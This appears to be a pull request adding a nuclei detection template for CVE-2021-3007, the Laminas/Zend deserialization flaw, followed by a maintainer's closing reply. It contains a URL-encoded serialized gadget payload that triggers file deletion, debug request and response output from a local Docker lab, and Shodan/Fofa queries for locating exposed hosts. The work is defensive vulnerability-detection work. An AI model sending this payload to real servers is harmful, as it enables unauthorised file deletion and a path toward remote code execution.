AddCVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization

[thanhhungg97]

/attempt #14236

PR Information

• Added CVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization
• References:
  • CVE-2021-3007 - Laminas Project laminas-http - Insecure Deserialization 💰 #14236
  • https://nvd.nist.gov/vuln/detail/CVE-2021-3007
  • https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/

Template validation

• Validated with a host running a vulnerable version and/or configuration (True Positive)
• Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details

Vulnerability Summary:
Laminas Project laminas-http before 2.14.2 and Zend Framework 3.0.0 contain an insecure deserialization vulnerability in the __destruct method of Zend\Http\Response\Stream. Exploitation requires an application endpoint that calls unserialize() on attacker-controlled data.

Gadget Chain:

• Class: Zend\Http\Response\Stream (25 chars)
• Properties: streamName (protected), stream (protected), cleanup (protected)
• Impact: Arbitrary file deletion via unlink(), chainable with other gadgets for RCE

Debug Output (True Positive):

[INF] [CVE-2021-3007] Dumped HTTP request for http://localhost:8080

POST / HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

data=O%3A25%3A%22Zend%5CHttp%5CResponse%5CStream%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00streamName%22%3Bs%3A20%3A%22%2Ftmp%2Fnuclei_test.txt%22%3Bs%3A9%3A%22%00%2A%00stream%22%3BN%3Bs%3A10%3A%22%00%2A%00cleanup%22%3Bb%3A1%3B%7D

[DBG] [CVE-2021-3007] Dumped HTTP response http://localhost:8080

HTTP/1.1 200 OK
Content-Type: application/json
X-Powered-By: Zend Framework

{"status":"success","message":"Object unserialized and will be destroyed","type":"Laminas\\Http\\Response\\Stream"}

[CVE-2021-3007] [http] [critical] http://localhost:8080 ["Laminas\\\\Http\\\\Response\\\\Stream"]

Vulnerable Environment:
Docker environment included in CVE-2021-3007-docker/ folder for validation:

• PHP 8.0 + Apache
• laminas-http 2.14.1 (vulnerable version)
• Simple PHP app with unserialize endpoint

cd http/cves/2021/CVE-2021-3007-docker
docker-compose up -d
nuclei -t ../CVE-2021-3007.yaml -u http://localhost:8080 -debug

Shodan Query: http.component:"Zend Framework"
Fofa Query: app="Zend-Framework"

Notes

This CVE is a library-level vulnerability that requires:

1. Application using vulnerable laminas-http (<2.14.2) or Zend Framework 3.0.0
2. An endpoint that calls unserialize() on user-controlled input

The template demonstrates successful deserialization of the Zend\Http\Response\Stream gadget class, confirming the vulnerability exists. The gadget chain enables arbitrary file deletion and can be combined with other gadgets for RCE depending on available classes in the application.

This vulnerability was actively exploited in the wild by the FreakOut botnet (January 2021).

[thanhhungg97]

/attempt #14236

[DhiyaneshGeek]

Hi @thanhhungg97

Thanks for participating in the Bounty Claim , we are going ahead with this PR #14241 , since it met all the requirements of the program

Due to the following reason we are closing this PR